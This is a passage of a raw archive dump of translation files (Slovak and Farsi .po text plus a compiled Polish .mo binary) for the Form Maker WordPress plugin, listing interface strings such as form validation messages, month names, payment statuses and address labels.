#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Je nám ľúto, ale nemáte možnosť nahrať tento typ súboru."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Chyba môže súbor nemožno presunúť."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "Toto pole %s vyžaduje jedinečný prístup a táto hodnota bola už podaná."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Chyba, bol e-mail neposlal."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Nič bol predložený."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Váš formulár bol úspešne odoslaný."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Chyba, bol e-mail neposlal."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Vaša e-mailová adresa je už overená."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Váš e-mail bol úspešne overený."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Váš e-mail overenie vypršal."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Overovací odkaz je neplatný."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "pole je povinné."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Toto nie je platná e-mailová adresa."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr "Nemôžete vybrať bývalej termín. Vyberte dátum počnúc aktuálne."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "hodnota musí byť medzi "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Množstvo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Vaše skóre by mala byť menšia ako "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Názov"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Meno"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Priezvisko"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Stredná"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Kód oblasti"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Telefónne číslo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dolárov"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Centov"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Od"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Pre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "ísť "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "obnoviť "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Vyberte pole "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Vyberte dátum"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-pl_PL.mo000060400000007457152434416630012216 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��	s
}
	�
�

�
�
	�
�
$�
)�
'=BK	NXahqy�	����I�
$
1?	L1V��
��$�L�$/
T
g
%j
>�
(�
.�
0'(XU�'��4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:02+0400
PO-Revision-Date: 2015-05-22 17:02+0400
Last-Translator: 
Language-Team: 
Language: pl
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: C:\wamp\www\wordpress\wp-content\plugins\form-maker
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
KwiecieńNumer kierunkowySierpieńCentówMiejscowośćKrajGrudzieńDolarówBłąd, e-mail nie został wysłany.Błąd, plik nie może być przeniesiona.Podano niepoprawny kod bezpieczeństwa.LutyPierwszyOdprzejdź StyczeńLipiecCzerwiecOstatniMarzecMajŚrodkowyNic nie zostało złożone.ListopadPaździernik(Phone Number) Numer telefonu: __________________________________________Postal / Zip CodeIlośćzresetować Wybierz datęWybierz poleWrzesieńPrzepraszamy, nie możesz wgrać tego typu pliku.Stan / województwo / regionUlicaLinia Ulica 2ThePlik przekracza dopuszczalny rozmiarTo pole %s wymaga unikalną pozycję i wartość ta została już złożone.To nie jest prawidłowy adres email.Stanowisko/FunkcjaNaLink Weryfikacja jest nieprawidłowy.Nie można wybrać byłych termin. Wybierz datę, od obecnego.Twój adres e-mail jest już sprawdzone.Twój e-mail został pomyślnie zweryfikowany.Twój e-mail weryfikacji Upłynął limit czasu.Formularz został przesłany pomyślnie.Twoje IP jest na czarnej liście. Proszę skontaktować się z administratorem stronyTwój wynik powinien być niższy niż Pole jest wymagane.Wartość musi być międzylanguages/form_maker-fa_IR.po000060400000060050152434416630012157 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:54+0400\n"
"PO-Revision-Date: 2015-05-22 16:54+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: fa\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "آدرس"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "خط آدرس خیابان 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "شهر"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "ایالت / استان / منطقه"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "پستی / کد پستی"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "کشور"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "ژانویه"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "فوریه"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "ماه مارس"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "آوریل"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "مه"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "ژوئن"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "جولای"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "اوت"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "سپتامبر"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "اکتبر"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "نوامبر"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "دسامبر"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "خطا، کد امنیتی نادرست است."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "IP شما در لیست سیاه است. لطفا با مدیر سایت تماس بگیرید."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "فایل بیش از اندازه مجاز"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "با عرض پوزش، شما اجازه به آپلود این نوع از فایل."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "خطا، فایل را نمی توان منتقل شده است."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"%s در این زمینه نیاز به یک ورودی منحصر به فرد است و این مقدار در حال حاضر "
"ارائه شد."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "خطا، ایمیل فرستاده نشد."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "هیچ کس را مشاهده کنید."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "فرم شما با موفقیت ارسال شد."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
